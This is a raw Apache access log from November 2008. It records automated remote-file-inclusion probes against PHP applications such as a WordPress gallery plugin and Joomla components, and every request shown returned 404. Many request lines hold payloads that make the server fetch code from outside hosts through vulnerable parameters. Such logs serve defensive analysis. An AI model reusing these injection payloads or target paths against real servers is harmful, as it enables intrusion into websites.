220.100.228.195 - - [15/Nov/2008:21:40:17 -0600] "GET //config/dbutil.bck.php?confdir=? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
220.100.228.195 - - [15/Nov/2008:21:40:17 -0600] "GET /logs//config/dbutil.bck.php?confdir=? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
12.32.58.38 - - [15/Nov/2008:21:40:38 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
220.100.228.195 - - [15/Nov/2008:21:41:21 -0600] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
219.85.63.226 - - [15/Nov/2008:21:43:41 -0600] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
219.85.63.226 - - [15/Nov/2008:21:43:41 -0600] "GET //include/scripts/export_batch.inc.php?DIR=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
220.100.228.195 - - [15/Nov/2008:21:44:22 -0600] "GET /logs/access_log.1214956800//include/write.php?dir=? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
220.100.228.195 - - [15/Nov/2008:21:44:23 -0600] "GET //include/write.php?dir=? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
220.100.228.195 - - [15/Nov/2008:21:44:23 -0600] "GET /logs//include/write.php?dir=? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
220.100.228.195 - - [15/Nov/2008:21:44:52 -0600] "GET /logs/access_log.1216425600//include/write.php?dir=? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
213.207.110.102 - - [15/Nov/2008:21:46:49 -0600] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:21:46:49 -0600] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:21:47:17 -0600] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:21:47:17 -0600] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
209.97.203.3 - - [15/Nov/2008:21:47:45 -0600] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path[docroot]=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:21:47:57 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:21:47:57 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:21:47:57 -0600] "GET /logs/access_log.1219536000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:21:47:58 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:21:47:58 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:21:47:58 -0600] "GET /logs/access_log.1219536000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
213.207.110.102 - - [15/Nov/2008:21:48:48 -0600] "GET /logs/access_log.1207180800//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 373 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:21:48:53 -0600] "GET /logs/access_log.1207180800//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 373 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:21:49:24 -0600] "GET /logs/access_log.1208304000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 373 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:21:49:34 -0600] "GET /logs/access_log.1208304000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 373 "-""libwww-perl/5.79"
84.234.72.255 - - [15/Nov/2008:21:51:31 -0600] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vortexguild.org/phpRaider//authentication/smf/fx29id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
84.234.72.255 - - [15/Nov/2008:21:51:31 -0600] "GET /logs/access_log.1207180800//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vortexguild.org/phpRaider//authentication/smf/fx29id.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
84.234.72.255 - - [15/Nov/2008:21:51:34 -0600] "GET /logs/access_log.1207180800//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vortexguild.org/phpRaider//authentication/smf/fx29id.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
84.234.72.255 - - [15/Nov/2008:21:51:34 -0600] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vortexguild.org/phpRaider//authentication/smf/fx29i